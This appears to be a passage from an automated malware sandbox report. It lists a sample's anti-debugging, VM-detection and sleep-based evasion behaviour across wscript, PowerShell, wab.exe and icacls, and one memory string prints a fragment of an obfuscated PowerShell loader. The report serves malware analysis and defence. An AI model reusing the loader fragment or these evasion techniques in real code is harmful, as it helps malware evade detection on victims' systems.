Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20161843 rdtsc 11_2_20161843
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6301 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3558 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6450 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3273 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.3 %
Source: C:\Windows\SysWOW64\icacls.exe API coverage: 3.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6052 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1484 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688 Thread sleep count: 6450 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688 Thread sleep count: 3273 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe TID: 6684 Thread sleep time: -50000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\icacls.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\icacls.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003AB130 FindFirstFileW,FindNextFileW,FindClose, 13_2_003AB130
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000002.00000002.2726435703.00000156FCD16000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWaa%SystemRoot%\system32\mswsock.dllform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHaQ
Source: wab.exe, 0000000B.00000002.2772002639.0000000004367000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW A<
Source: wscript.exe, 00000000.00000003.2083975306.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093730324.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097511143.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085394323.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085148892.0000020D166C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085966002.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094838881.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085148892.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085623443.0000020D166E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097375103.0000020D166E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093730324.0000020D166E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2094838881.0000020D16742000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\O
Source: wscript.exe, 00000000.00000002.2097511143.0000020D1673B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: wscript.exe, 00000000.00000003.2083975306.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093730324.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097511143.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085394323.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085966002.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094838881.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085148892.0000020D16745000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20161843 rdtsc 11_2_20161843
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02A7D8A4 LdrInitializeThunk, 5_2_02A7D8A4
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E016 mov eax, dword ptr fs:[00000030h] 11_2_2013E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E016 mov eax, dword ptr fs:[00000030h] 11_2_2013E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E016 mov eax, dword ptr fs:[00000030h] 11_2_2013E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E016 mov eax, dword ptr fs:[00000030h] 11_2_2013E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E903E mov eax, dword ptr fs:[00000030h] 11_2_201E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E903E mov eax, dword ptr fs:[00000030h] 11_2_201E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E903E mov eax, dword ptr fs:[00000030h] 11_2_201E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E903E mov eax, dword ptr fs:[00000030h] 11_2_201E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A020 mov eax, dword ptr fs:[00000030h] 11_2_2011A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011C020 mov eax, dword ptr fs:[00000030h] 11_2_2011C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20122050 mov eax, dword ptr fs:[00000030h] 11_2_20122050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201C705E mov ebx, dword ptr fs:[00000030h] 11_2_201C705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201C705E mov eax, dword ptr fs:[00000030h] 11_2_201C705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B052 mov eax, dword ptr fs:[00000030h] 11_2_2014B052
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov ecx, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014C073 mov eax, dword ptr fs:[00000030h] 11_2_2014C073
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5060 mov eax, dword ptr fs:[00000030h] 11_2_201F5060
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20125096 mov eax, dword ptr fs:[00000030h] 11_2_20125096
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014D090 mov eax, dword ptr fs:[00000030h] 11_2_2014D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014D090 mov eax, dword ptr fs:[00000030h] 11_2_2014D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015909C mov eax, dword ptr fs:[00000030h] 11_2_2015909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012208A mov eax, dword ptr fs:[00000030h] 11_2_2012208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011D08D mov eax, dword ptr fs:[00000030h] 11_2_2011D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E60B8 mov eax, dword ptr fs:[00000030h] 11_2_201E60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E60B8 mov ecx, dword ptr fs:[00000030h] 11_2_201E60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A20DE mov eax, dword ptr fs:[00000030h] 11_2_201A20DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F50D9 mov eax, dword ptr fs:[00000030h] 11_2_201F50D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201490DB mov eax, dword ptr fs:[00000030h] 11_2_201490DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov ecx, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov ecx, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov ecx, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov ecx, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
